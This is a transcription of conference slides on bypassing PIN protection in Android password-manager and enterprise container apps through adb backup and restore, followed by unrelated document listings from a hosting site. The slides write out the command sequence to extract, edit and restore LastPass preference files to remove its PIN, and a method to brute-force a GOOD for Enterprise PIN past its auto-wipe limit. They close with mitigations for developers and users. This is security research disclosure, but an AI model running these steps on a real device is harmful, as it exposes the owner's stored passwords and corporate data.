@ChrisJohnRiley > whoami
|
|
|
- Reynold Heath
- 10 years ago
- Views:
Transcription
1
2 @ChrisJohnRiley > whoami IT Security Analyst / Security Consultant Raiffeisen Informatik GmbH R-IT CERT Team Regular conference speaker DEF CON Bsides Hashdays SecZone blog Abject Failure (See Life for reference) Chris John Riley
3 THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING SOCRATES: APOLOGY, 21D Chris John Riley
4
5 Why Scenario How Closer Look Making it easy Review Chris John Riley
6 Chris John Riley
7 WHY? Chris John Riley
8
9 too much information Chris John Riley
10
11
12 Chris John Riley
13 Containers Multiple uses Pa$$w0rd databases Corporate mail containers Secure notes / files... Chris John Riley
14
15 Chris John Riley
16 but Chris John Riley
17 The device is insecure Chris John Riley
18 ...or worse Chris John Riley
19 BYOD * * Bring Your Own Disease Chris John Riley
20
21 Solution? Chris John Riley
22 Move the security closer to the data! Chris John Riley
23 Chris John Riley
24 but Chris John Riley
25 I lost my phone! Chris John Riley
26 314 mobile phones 'stolen in London every day' offenders traced three or four times out of 10 Source: UK Metropolitan Police 01/2013 Chris John Riley
27 state of Device security Chris John Riley
28 Chris John Riley
29
30 KEEP CALM Chris John Riley
31 secure containers will save us Chris John Riley
32 or not Chris John Riley
33 Chris John Riley
34 . Sc nario Chris John Riley
35 Scenario Given physical access to a device What security do secure containers provide temporary access (< 3 minutes) permanent access Chris John Riley
36
37 but Chris John Riley
38 remember Chris John Riley
39 secure containers will SAVE us Chris John Riley
40 Chris John Riley
41 Chris John Riley
42 G ALS Chris John Riley
43 TL;DR Chris John Riley
44 pwn secure containers Chris John Riley
45 NOT MY G AL Chris John Riley
46 bypass PIN 1234 device Chris John Riley
47 r00t the device Chris John Riley
48 do anything resembling Chris John Riley
49 Chris John Riley
50 Chris John Riley
51 Chris John Riley
52 HOW? Chris John Riley
53 keep it simple Chris John Riley
54 Android Debug Bridge Chris John Riley
55 ADB Android Debug Bridge Requires USB Debugging Enabled Doesn't require ROOTed device Root grants further access / makes things trivial Chris John Riley
56 adb functions Chris John Riley
57 ADB Android Debug Bridge Allows application side-loading [un]install applications over adb Doesn t require device to be active Can be PIN locked (for some functions) New security implemented in Chris John Riley
58 ADB Android Debug Bridge adb backup Backup Android device over adb (ICS onwards) -system system data -apk application apk Can backup specific application data individually adb backup com.android.app -f backup.ab Chris John Riley
59 ADB Android Debug Bridge adb restore Restore Android backup over adb Restore specific application data individually with or without application (apk) adb restore backup.ab Chris John Riley
60 ADB Android Debug Bridge adb pull / push Copy data to / from device over adb Limited access for non-root users no access to application config without root Works on locked devices (PIN Protected) adb pull /sdcard/secret.txt secret.txt Chris John Riley
61 ADB Android Debug Bridge adb shell Shell access on device Send keys / taps Limited for non-root users Works on locked devices (PIN Protected) adb shell Chris John Riley
62 Supporting Tools openssl w/ zlib support star tar tool w/ added functionality we need Chris John Riley
63 Chris John Riley
64 Closer look Chris John Riley
65 Chris John Riley
66 lastpass Chris John Riley
67
68 lastpass Personal solution (w/ enterprise option) Uses online sync Can be secured with a PIN Can wipe data after 5 false logons Restricts screenshots Chris John Riley
69 Can store lastpass.com password So users don't need to type it EVERY time Reduces security Makes it usable! Chris John Riley
70 Why store the PW? Chris John Riley
71 Easy to remember Impossible to type! Chris John Riley
72 It's OK though Chris John Riley
73 You can enable a PIN! Chris John Riley
74 PIN Security Limited to 4 digits! auto-wipe data after 5 false logons Chris John Riley
75 PIN == SECURE! Chris John Riley
76
77 AndroidManifest.xml Chris John Riley
78 AndroidManifest.xml <application android:allowbackup= true > Chris John Riley
79 Default: true Chris John Riley
80 adb backup com.lastpass.lpandroid f lp.ab Chris John Riley
81 What good is an.ab file? Chris John Riley
82 Android Backup (.ab) zlib compressed (kinda) skip header (24 bytes) pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 openssl zlib -d > dropbox.tar Chris John Riley
83
84 LPandroid.xml lastpass.com username laspass.com password (encoded) PIN (encoded) Settings... Chris John Riley
85 <string name="reprompt_tries"> 0 </string> Chris John Riley
86 That looks interesting! Chris John Riley
87 ( ) THEORY Chris John Riley
88 if reprompt_tries < 5: prompt_for_pin() else drop_the_dbass() end Chris John Riley
89 Theory reprompt_tries as iterator increases till it reaches 5 Sounds reasonable edit the XML and restore it Let's set reprompt_tries to then ;) Chris John Riley
90 Proposed Attack Backup app data Edit XML set reprompt_tries to Repackage Restore Chris John Riley
91 Chris John Riley
92 0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley
93 Not the easiest process... Chris John Riley
94 Chris John Riley
95 counter++ Chris John Riley
96 good news Chris John Riley
97 We get 10,000 tries Chris John Riley
98 bad news Chris John Riley
99 We get 10,000 tries Chris John Riley
100 Let s make it easier Chris John Riley
101 No PIN > PIN Chris John Riley
102 <string name="passwordrepromptonactivate">0</string> <string name="pincodeforreprompt"></string> <string name="requirepin">0</string> Chris John Riley
103 PROFIT! Chris John Riley
104 Easier Attack Backup app data Edit XML remove PIN Repackage Restore WIN! Chris John Riley
105 Chris John Riley
106 for points... Chris John Riley
107 Persistence Chris John Riley
108 Persistence Backup LastPass from device A Edit backup to remove PIN Rebuild backup Restore backup to device B Close & restart to re-sync changes from device A Profit? Chris John Riley
109 ...but I RESET my password! Chris John Riley
110 PROFIT ++ Chris John Riley
111 ... Chris John Riley
112 GOOD for enterprise Chris John Riley
113 GOOD Enterprise solution Contacts intranet Browser Secured with a PIN or password enterprise policy Wipes data/device after 10 false logons Chris John Riley
114 Adv. security features Double encryption SSL Tunnel + Encrypted contents Full MDM solution Password Policies r00t detection emulator detection advanced detection Chris John Riley
115 Lost device (BYOD) Can an attacker prevent secure wipe Can an attacker access cached data Chris John Riley
116 PROBLEM Chris John Riley
117 unlike LastPass Chris John Riley
118 preferences are encrypted Chris John Riley
119 PROBLEM Chris John Riley
120 auto-wipe after 10 false logons Chris John Riley
121 Chris John Riley
122 Disable PIN Chris John Riley
123 auto-wipe counter Chris John Riley
124 brute-force Chris John Riley
125 but Chris John Riley
126 AndroidManifest.xml <application android:allowbackup= true > Chris John Riley
127
128 THEORY Chris John Riley
129 Theory Auto-wipe counter Stored IN app data somewhere Chris John Riley
130 THEORY Chris John Riley
131 adb restore Chris John Riley
132 over write auto-wipe counter Chris John Riley
133 #facepalm Chris John Riley
134 brute-force Chris John Riley
135 Naïve Attack Backup app data until good.unlock? Try 9 PINS Restore app data Chris John Riley
136 PROBLEM Chris John Riley
137 Chris John Riley
138 Naïve Attack timing 4 digit PIN est. 4.5 hours* 6 digit PIN est days* 8 digit PIN est. 5 years* * ppm ~ 50% keyspace Chris John Riley
139 Naïve Attack timing 4 lower alphanum est. 31 days* 6 lower alphanum est. 3 years* 8 lower alphanum est. 110 years* * ppm ~ 50% keyspace Chris John Riley
140 Naïve Attack timing 4 mixed alphanum est. 1 year* 6 mixed alphanum est years* 8 mixed alphanum est years* * ppm ~ 50% keyspace Chris John Riley
141 Chris John Riley
142 CONTAINER Device Chris John Riley
143 CONTAINER Device Chris John Riley
144 CONTAINER Device Chris John Riley
145 #facepalm #facepalm Chris John Riley
146 Chris John Riley
147
148
149 Adv. Attack Automate PIN + restore adb shell input text adb shell input keyevent adb shell input tap Chris John Riley
150 Minimize keyspace Password Rules No sequenced numbers (e.g. 4567) No duplicate numbers (e.g. 1111) Result Reduced keyspace Chris John Riley
151 Chris John Riley
152 PROFIT! Chris John Riley
153 Chris John Riley
154 Making it easy Chris John Riley
155 methodology Common methodology Backup (adb) Extract Examine here be dragons Edit bypass all the things Repack Restore (adb) Chris John Riley
156 remember this process? Chris John Riley
157 0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley
158 Say that 10 times fast! Chris John Riley
159
160 automation Chris John Riley
161 Chris John Riley
162 Chris John Riley
163 ab_unpacker.py Chris John Riley
164 ab_packer.py Chris John Riley
165 Makes 0wning things Chris John Riley
166 o o 200 / quicker 1000 o / o funner Chris John Riley
167 Chris John Riley
168
169
170 Chris John Riley
171 RE VIEW Chris John Riley
172 secure containers!= SECURE containers Chris John Riley
173 Physical access Chris John Riley
174
175 Chris John Riley
176 IT Chris John Riley
177 Developers Chris John Riley
178 Chris John Riley
179 android.allowbackup Chris John Riley
180 Some devs GET it! Chris John Riley
181 Chris John Riley
182 pref files Chris John Riley
183 Securing Apps Preference files are NOT secret Encrypt preference data ONLY store encrypted passwords No XOR / base64 please Don t TRUST the config HMAC Sign Encrypt Chris John Riley
184 android backup Chris John Riley
185 Securing Apps Disallow Android Backup if you don t absolutely need it! <application android:allowbackup= false > Chris John Riley
186 extra security Chris John Riley
187 Extra Security USB Debugging Disable app when activated Root makes these hack easier still edit/read preference files on device itself ROOT detection is too basic easy to fool Chris John Riley
188 users end Chris John Riley
189 Users Encrypt your device Encrypts ADB backups Need to enter same passcode on backup screen Disable USB Debugging protects against adb pull/push attacks Don t loose your phone ;) Chris John Riley
190 Chris John Riley
191 Chris John Riley
192 Chris John Riley
193 Question time Chris John Riley
194 Chris John Riley
195 Thank you for your attention! Vielen Dank für Ihre Aufmerksamkeit! Raiffeisen Informatik GmbH Lilienbrunngasse 7-9 A-1020 Wien T +43 1/ F +43 1/ E [email protected] Chris John Riley
Insecure Internal Storage in Android
Insecure Internal Storage in Android Claud Xiao HITCON, Taipei 2014.08 It s well known that in Android external storage is globally read/writable thus not secure; internal storage is isolated for each
Mobile Iron User Guide
2015 Mobile Iron User Guide Information technology Sparrow Health System 9/1/2015 Contents...0 Introduction...2 Changes to your Mobile Device...2 Self Service Portal...3 Registering your new device...4
Mobile Device Management Solution Hexnode MDM
Mobile Device Management Solution Hexnode MDM Frequently Asked Questions www.hexnode.com Frequently Asked Questions How is Hexnode MDM license calculated?...4 Which ports do I need to open for Hexnode
Salesforce1 Mobile Security Guide
Salesforce1 Mobile Security Guide Version 1, 1 @salesforcedocs Last updated: December 8, 2015 Copyright 2000 2015 salesforce.com, inc. All rights reserved. Salesforce is a registered trademark of salesforce.com,
How to Install Applications (APK Files) on Your Android Phone
How to Install Applications (APK Files) on Your Android Phone Overview An Android application is stored in an APK file (i.e., a file named by {Application Name}.apk). You must install the APK on your Android
When enterprise mobility strategies are discussed, security is usually one of the first topics
Acronis 2002-2014 Introduction When enterprise mobility strategies are discussed, security is usually one of the first topics on the table. So it should come as no surprise that Acronis Access Advanced
GO!Enterprise MDM Device Application User Guide Installation and Configuration for BlackBerry
GO!Enterprise MDM Device Application User Guide Installation and Configuration for BlackBerry GO!Enterprise MDM Version 4.11.x GO!Enterprise MDM for BlackBerry 1 Table of Contents GO!Enterprise MDM for
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
Pentesting Android Apps. Sneha Rajguru (@Sneharajguru)
Pentesting Android Apps Sneha Rajguru (@Sneharajguru) About Me Penetration Tester Web, Mobile and Infrastructure applications, Secure coding ( part time do secure code analysis), CTF challenge writer (at
GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android
GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android GO!Enterprise MDM for Android, Version 3.x GO!Enterprise MDM for Android 1 Table of Contents GO!Enterprise MDM
MDM, COPE, BYOD, MAM, MIM, PIM???
MDM, COPE, BYOD, MAM, MIM, PIM??? Peter Teufl [email protected] Overview Deployment scenarios Managed COPE BYOD Consumer Platform security lication security Best Practice Managed Managed Handing
Security in Android apps
Security in Android apps Falco Peijnenburg (3749002) August 16, 2013 Abstract Apps can be released on the Google Play store through the Google Developer Console. The Google Play store only allows apps
Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0
Security Guide BlackBerry Enterprise Service 12 for ios, Android, and Windows Phone Version 12.0 Published: 2015-02-06 SWD-20150206130210406 Contents About this guide... 6 What is BES12?... 7 Key features
Information Systems. Connecting Smartphones to NTU s Email System
Information Systems Connecting Smartphones to NTU s Email System Connecting Smartphones to NTU s Email System Contents Things to be aware of before you start 3 Connecting a Windows Mobile 6 (6.0-6.5) Phone
UP L18 Enhanced MDM and Updated Email Protection Hands-On Lab
UP L18 Enhanced MDM and Updated Email Protection Hands-On Lab Description The Symantec App Center platform continues to expand it s offering with new enhanced support for native agent based device management
GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android with TouchDown
GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android with TouchDown GO!Enterprise MDM for Android, Version 3.x GO!Enterprise MDM for Android with TouchDown 1 Table
SysAid MDM User Guide for ios
SysAid MDM User Guide for ios Table of Contents Introduction Enrolling Your ios Mobile Device in SysAid MDM Unenrolling Your ios Mobile Device from SysAid MDM Have Any Questions? Introduction SysAid Mobile
HDDtoGO. User Guide. User Manual Version 3.4 2004-2010 CoSoSys SRL 2010 A-DATA Technology Co., Ltd. HDDtoGO User Manual
HDDtoGO User Guide User Manual Version 3.4 2004-2010 CoSoSys SRL 2010 A-DATA Technology Co., Ltd. HDDtoGO User Manual Table of Contents Table of Contents...1 1. Introduction...2 2. System Requirements...3
Gladinet Cloud Backup V3.0 User Guide
Gladinet Cloud Backup V3.0 User Guide Foreword The Gladinet User Guide gives step-by-step instructions for end users. Revision History Gladinet User Guide Date Description Version 8/20/2010 Draft Gladinet
Total Baby. Backup & Sync Instructions for Version 2.0+
Total Baby Backup & Sync Instructions for Version 2.0+ Backup! 3 Introduction and Setup! 3 How to Backup! 3 Backup using E-Mail! 4 Backup using Wi-Fi! 4 Syncing 101! 5 Introduction and Setup! 5 How it
SYNCSHIELD FEATURES. Preset a certain task to be executed. specific time.
SYNCSHIELD FEATURES This document describes the diversity of SyncShield features. Please note that many of the features require a certain platform version, often earlier software versions do not support
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
Samsung KNOX User Guide KNOX for Consumers Edition
Samsung KNOX User Guide KNOX for Consumers Edition Version 1.3 Jan 07, 2015 Copyright Notice Copyright 2013 Samsung Electronics Co. Ltd. All rights reserved. Samsung is a registered trademark of Samsung
Security for mobile apps
November 2014 Security for mobile apps This white paper provides education on security considerations and requirements for mobile apps. 1 Contents Authentication & security for mobile apps 3 Securing mobile
AirWatch for Android Devices
Overview What is AirWatch AirWatch is the mobile device management (MDM) system provided by UMHS to ensure security for smart phones and tablets that connect to the UMHS environment. AirWatch provides
Using Devices. Chapter 3
Chapter 3 Using Devices es The Devices page lists all the devices you have enrolled in the Centrify identity platform and lets you send commands to the devices. Device related tasks that you can perform
Secure Password Managers and Military-Grade Encryption on Smartphones: Oh, Really? Andrey Belenko and Dmitry Sklyarov Elcomsoft Co. Ltd.
Secure Password Managers and Military-Grade Encryption on Smartphones: Oh, Really? Andrey Belenko and Dmitry Sklyarov Elcomsoft Co. Ltd. Securing Data-at-Rest: PC vs Smartphone Threat Model BlackBerry
Rocket Mail Smartphone Configuration Guide. Version 2.0
Rocket Mail Smartphone Configuration Guide Version 2.0 Nick Sherman 3/1/2013 Android Configuration 1. From the Applications menu, select Email. This application may be named Mail on some versions of Android.
GlobalProtect Configuration for IPsec Client on Apple ios Devices
GlobalProtect Configuration for IPsec Client on Apple ios Devices Tech Note PAN-OS 4.1 Revision D 2013, Palo Alto Networks, Inc. www.paloaltonetworks.com CONTENTS OVERVIEW... 3 PREREQUISITES... 3 GLOBALPROTECT
PC/Tablet/Smartphone Security & Password Managers
PC/Tablet/Smartphone Security & Password Managers What you should do to keep your PC secure. Does the type of PC you use matter? What to do to keep your smartphone secure does the brand matter, why? Tablet
BlackBerry Link for Windows. Version: 1.2.3. User Guide
BlackBerry Link for Windows Version: 1.2.3 User Guide Published: 2014-01-20 SWD-20140120093847797 Contents Related resources...5 Getting started...6 About BlackBerry Link... 6 Getting to know BlackBerry
Note: Support: Never use your TruMobi email application for personal use.
BYOD - Setting up Email Access on your ios mobile device This document provides step-by-step instructions for setting up corporate account on your ios mobile device. Note: The TruMobi email application
Outlook Connector Installation & Configuration groupwaresolution.net Hosted MS Exchange Alternative On Linux
Outlook Connector Installation & Configuration groupwaresolution.net Hosted MS Exchange Alternative On Linux Page 1 of 5 DOWNLOAD Please download the connector installer msi file and save it to your computer.
Comodo Mobile Security for Android Software Version 2.5
Comodo Mobile Security for Android Software Version 2.5 User Guide Guide Version 2.5.111014 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1.Introduction to Comodo Mobile
Reboot, reset, erase, power off, restore - what's the difference?
Reboot, reset, erase, power off, restore - what's the difference? Sleeping The ipad sleeps to conserve your battery. This is the normal way to end your ipad session. Everything on the ipad is functioning
Pryvate App User Manual
Pryvate App User Manual 2.0 Powered by Criptyque Pryvate is the most secure voice, email & chat app for business people & individuals that require a high level of communications encryption to protect their
Students Mobile Messaging Registration & Configuration
Rutgers Biomedical and Health Sciences (RBHS) has implemented security controls to be applied to all mobile devices (Smart Phones and tablets) that contain RBHS (NJMS) email. These controls have been established
the cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level
Click to edit Master title style Click to edit Master text styles The Second nightmare level behind Third level the cross platform Fourth level» Fifth level mobile apps dream Marco Grassi @marcograss [email protected]
FAQ for ipad (ios 5.x)
FAQ for ipad (ios 5.x) Content: 1. Connecting to CityU Wireless Local Area Network (CityU WLAN) 2. Setting up the Microsoft Exchange account (for staff only) 3. Setting up the Office365 Exchange online
Generating an Apple Push Notification Service Certificate for use with GO!Enterprise MDM. This guide provides information on...
Generating an Apple Push Notification Service Certificate for use with GO!Enterprise MDM This guide provides information on...... APNs Requirements Tips on Enrolling in the ios Developer Enterprise Program...
Installing Logos SSL Certificates on Mobile Devices
Installing Logos SSL Certificates on Mobile Devices Phase 1: Obtain the SSL Certificate You can obtain the SSL certificate in one of 2 ways. Method 1 Download the SSL certificate from it.logostech.net
Microsoft Outlook Phone Set Up
Microsoft Outlook Phone Set Up 2013 Information Technology Services 2013 Microsoft Corporation. All rights reserved Contents Set up Microsoft Exchange email on an Android... 3 Set up Exchange email on
Setting up your new Live Server Account
Setting up your new Live Server Account Welcome to Remote Data Backups LiveVault Service. This document will help you set up the agent service on your server as well as giving you some guidance on accessing
Windows Phone 8.1 Mobile Device Management Overview
Windows Phone 8.1 Mobile Device Management Overview Published April 2014 Executive summary Most organizations are aware that they need to secure corporate data and minimize risks if mobile devices are
How to enable Disk Encryption on a laptop
How to enable Disk Encryption on a laptop Skills and pre-requisites Intermediate IT skills required. You need to: have access to, and know how to change settings in the BIOS be confident that your data
Flexible Identity. OTP software tokens guide. Multi-Factor Authentication. version 1.0
Flexible Identity Multi-Factor Authentication OTP software tokens guide version 1.0 Publication History Date Description Revision 2014.02.07 initial release 1.0 Copyright Orange Business Services 2 of
Email Set Up Instructions
Email Set Up Instructions Email Support...1 Important Fist Steps for all Users...2 DO YOU KNOW YOUR USERNAME AND PASSWORD?...2 Install the Despaminator CompanyV Certificate...2 What is Your Mail Client?...2
MDM User Guide June 2012
June 2012 Sy mantec Corporation, 2012 Page 1 Purpose of Document This document provides a guide for users of App Center to set up and use Mobile Device Management (MDM) capabilities. MDM allows the App
Sophos Mobile Control Administrator guide. Product version: 3.6
Sophos Mobile Control Administrator guide Product version: 3.6 Document date: November 2013 Contents 1 About Sophos Mobile Control...4 2 About the Sophos Mobile Control web console...7 3 Key steps for
Sophos Mobile Control Administrator guide. Product version: 3
Sophos Mobile Control Administrator guide Product version: 3 Document date: January 2013 Contents 1 About Sophos Mobile Control...4 2 About the Sophos Mobile Control web console...7 3 Key steps for managing
Remote Configuration for FileBrowser
Remote Configuration for FileBrowser Page 1 Remote Configuration for FileBrowser Introduction The ability to create and read settings files is built into all versions of FileBrowser. At its simplest, this
ipad Set Up Guide: Staff! 1 of! 20
ipad Set Up Guide: Staff! 1 of! 20 Follow the step-by-step directions in this document to activate your ipad; set up Lotus Notes Traveler; install and configure Google Chrome and Google Drive; and set
Cisco AnyConnect VPN for: Windows 8
Cisco AnyConnect VPN for: Windows 8 Introduction The following instructions detail how to set up Cisco VPN for Microsoft Windows using NetID+. You will need to use VPN with NetID+ if you are trying to
McAfee Enterprise Mobility Management 11.0 Software
Product Guide McAfee Enterprise Mobility Management 11.0 Software For use with epolicy Orchestrator 4.6.5-5.0 Software COPYRIGHT Copyright 2013 McAfee, Inc. Do not copy without permission. TRADEMARK ATTRIBUTIONS
Cobian9 Backup Program - Amanita
The problem with backup software Cobian9 Backup Program - Amanita Due to the quixotic nature of Windows computers, viruses and possibility of hardware failure many programs are available for backing up
Configuring an Android device to access Staff Wi-Fi and Email.
Information Services Revised 15.10.15 ISD Customer Services Configuring an Android device to access Staff Wi-Fi and Email. Screenshots provided from Google Nexus, Android version 4.2.1 Jelly Bean. Important
Specifications. What s Inside The box
Tablet of Contents Specifications.1 What s inside the box Tablet Parts Getting started... Connection to Internet..6 Task Bar..8 Install and Uninstall 9 Camera.10 HDMI.11 Trouble Shooting 11 Specifications
Lab 4 In class Hands-on Android Debugging Tutorial
Lab 4 In class Hands-on Android Debugging Tutorial Submit lab 4 as PDF with your feedback and list each major step in this tutorial with screen shots documenting your work, i.e., document each listed step.
SysAid MDM User Guide for Android
SysAid MDM User Guide for Android Table of Contents Introduction Enrolling Your Android Mobile Device in SysAid MDM Unenrolling Your Android Mobile Device from SysAid MDM Have Any Questions? Introduction
BYOD Guidelines A practical guide for implementing a successful BYOD Management program in an organization of any size.
April 2014 BYOD Guidelines A practical guide for implementing a successful BYOD Management program in an organization of any size. Bring your own device (BYOD) refers to the policy of permitting employees
Weak Spots in Enterprise Mobility Management Dennis Schröder
Weak Spots in Enterprise Mobility Management Dennis Schröder Personal details TÜV Informationstechnik GmbH TÜV NORD GROUP Dennis Schröder, M. Sc. IT Security Business Security & Privacy Product Manager
Office of Information Technology Connecting to Microsoft Exchange User Guide
OVERVIEW The Office of Information Technology is migrating its messaging infrastructure from Microsoft Exchange 2003 to Microsoft Exchange 2010. Moving to the latest technology will provide many enhancements
User Guide. SafeNet MobilePASS for Windows Phone
SafeNet MobilePASS for Windows Phone User Guide Technical Manual Template Release 1.0, PN: 000-000000-000, Rev. A, March 2013, Copyright 2013 SafeNet, Inc. All rights reserved. 1 Document Information Product
Product Manual. Mobile Device Managment Version 8.1. Last Updated: 06/07/15
Product Manual Mobile Device Managment Version 8.1 Last Updated: 06/07/15 Parallels IP Holdings GmbH Vordergasse 59 8200 Schaffhausen Switzerland Tel: + 41 52 632 0411 Fax: + 41 52 672 2010 www.parallels.com
Android App User Guide
www.novell.com/documentation Android App User Guide ZENworks Mobile Management 2.7.x August 2013 Legal Notices Novell, Inc., makes no representations or warranties with respect to the contents or use of
Sticky Password 7. Sticky Password 7 is the latest, most advanced, portable, cross platform version of the powerful yet
Sticky Password 7 Reviewer Guide Introduction Sticky Password 7 is the latest, most advanced, portable, cross platform version of the powerful yet simple password manager and form-filler. Its main goal
Mobile Device Management Version 8. Last updated: 16-09-14
Mobile Device Management Version 8 Last updated: 16-09-14 Copyright 2013, 2X Ltd. http://www.2x.com E-mail: [email protected] Information in this document is subject to change without notice. Companies names
Copyright 2013, 3CX Ltd. http://www.3cx.com E-mail: [email protected]
Manual Copyright 2013, 3CX Ltd. http://www.3cx.com E-mail: [email protected] Information in this document is subject to change without notice. Companies names and data used in examples herein are fictitious
Published : 2013-12-02 License : None
K9 1 2 Published : 2013-12-02 License : None INTRODUCTION K-9 Mail is an email application (app) for Android phones or tablets. K-9 supports multiple mailboxes, each independently configurable. T his ability
Q. I use a MAC How do I change my password so I can send and receive my email?
Password Change FAQ Q. I use a MAC How do I change my password so I can send and receive my email? A. First point a browser to http://www.redlands.edu/passwordmanager and change your password. Afterward,
Setup your university email on your Android smartphone
Setup your university email on your Android smartphone This guide is designed for student users with an Office365 mailbox who wish to access their University email through an Android device Students starting
Mobility Manager 9.5. Users Guide
Mobility Manager 9.5 Users Guide LANDESK MOBILITY MANAGER Copyright 2002-2013, LANDesk Software, Inc. and its affiliates. All rights reserved. LANDesk and its logos are registered trademarks or trademarks
Online Backup by Mozy. Common Questions
Online Backup by Mozy Common Questions Document Revision Date: June 29, 2012 Online Backup by Mozy Common Questions 1 What is Online Backup by Mozy? Online Backup by Mozy is a secure online data backup
VMware Horizon Workspace Security Features WHITE PAPER
VMware Horizon Workspace WHITE PAPER Table of Contents... Introduction.... 4 Horizon Workspace vapp Security.... 5 Virtual Machine Security Hardening.... 5 Authentication.... 6 Activation.... 6 Horizon
Penetration Testing Android Applications
Author: Kunjan Shah Security Consultant Foundstone Professional Services Table of Contents Penetration Testing Android Applications... 1 Table of Contents... 2 Abstract... 3 Background... 4 Setting up
NovaBACKUP Storage Server User Manual NovaStor / April 2013
NovaBACKUP Storage Server User Manual NovaStor / April 2013 2013 NovaStor, all rights reserved. All trademarks are the property of their respective owners. Features and specifications are subject to change
BYOD in the Enterprise
BYOD in the Enterprise MDM. The solution to BYOD? Context Information Security [email protected] October 2013 Context Information Security 30 Marsh Wall, London, E14 9TP +44 (0) 207 537 7515
Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH
Securing ios Applications Dr. Bruce Sams, OPTIMAbit GmbH About Me President of OPTIMAbit GmbH Responsible for > 200 Pentests per Year Ca 50 ios Pentests and code reviews in the last two years. Overview
Quick Start Guide. Version R9. English
Mobile Device Management Quick Start Guide Version R9 English February 25, 2015 Agreement The purchase and use of all Software and Services is subject to the Agreement as defined in Kaseya s Click-Accept
Cloud Backup Express
Cloud Backup Express Table of Contents Installation and Configuration Workflow for RFCBx... 3 Cloud Management Console Installation Guide for Windows... 4 1: Run the Installer... 4 2: Choose Your Language...
Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are.
Two Factor Authentication Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are. For example, one method currently utilized within
Salesforce Classic Guide for iphone
Salesforce Classic Guide for iphone Version 37.0, Summer 16 @salesforcedocs Last updated: July 12, 2016 Copyright 2000 2016 salesforce.com, inc. All rights reserved. Salesforce is a registered trademark
AirWatch for ios Devices
Overview What is AirWatch AirWatch is the mobile device management (MDM) system provided by UMHS to ensure security for smart phones and tablets that connect to the UMHS environment. AirWatch provides
OWA vs. MDM. Once important area to consider is the impact on security and compliance policies by users bringing their own devices (BYOD) to work.
OWA vs. MDM Introduction SmartPhones and tablet devices are becoming a common fixture in the corporate environment. As feature phones are replaced with new devices such as iphone s, ipad s, and Android
XenMobile Logs Collection Guide
XenMobile Logs Collection Guide 1 Contents Summary... 3 Background... 3 How to Collect Logs from Server Components... 4 Support Bundle Contents... 4 Operations Supported for Server Components... 5 Configurations
Remote Access Instructions
document rev. 8 updated 6/28/2012 Remote Access Instructions Table of Contents... Page 1 Finding the AFS Remote Access links and the AFS home page... 2 First time login with RSA fob (AFS option 1 SSL VPN
Exchange ActiveSync (EAS)
Exchange ActiveSync (EAS) EAS allows for the synchronization of email, contacts, calendar, tasks and notes from an Exchange email server to a mobile device. Configuring and Connecting ios devices (iphone,
WHITE PAPER AUGUST 2014. Preventing Security Breaches by Eliminating the Need to Transmit and Store Passwords
WHITE PAPER AUGUST 2014 Preventing Security Breaches by Eliminating the Need to Transmit and Store Passwords 2 WHITE PAPER: PREVENTING SECURITY BREACHES Table of Contents on t Become the Next Headline
White Paper. Anywhere, Any Device File Access with IT in Control. Enterprise File Serving 2.0
White Paper Enterprise File Serving 2.0 Anywhere, Any Device File Access with IT in Control Like it or not, cloud- based file sharing services have opened up a new world of mobile file access and collaborative
Administration Guide. . All right reserved. For more information about Specops Password Sync and other Specops products, visit www.specopssoft.
Administration Guide. All right reserved. For more information about Specops Password Sync and other Specops products, visit www.specopssoft.com Copyright and Trademarks Specops Password Sync is a trademark
NHSmail mobile configuration guide NotifySync V4.7 for Blackberry
Only devices running NotifySync version 4.7 support encryption at rest NHSmail mobile configuration guide NotifySync V4.7 for Blackberry Version: V.4 Date: March 2011 THIS INFORMATION IS FOR NHS STAFF
Dove User Guide Copyright 2010-2011 Virgil Trasca
Dove User Guide Dove User Guide Copyright 2010-2011 Virgil Trasca Table of Contents 1. Introduction... 1 2. Distribute reports and documents... 3 Email... 3 Messages and templates... 3 Which message is
FileMaker Server 15. Getting Started Guide
FileMaker Server 15 Getting Started Guide 2007 2016 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker and FileMaker Go are trademarks
Kaseya 2. User Guide. Version 1.0
Kaseya 2 Mobile Device Management User Guide Version 1.0 March 12, 2012 About Kaseya Kaseya is a global provider of IT automation software for IT Solution Providers and Public and Private Sector IT organizations.
iphone in Business How-To Setup Guide for Users
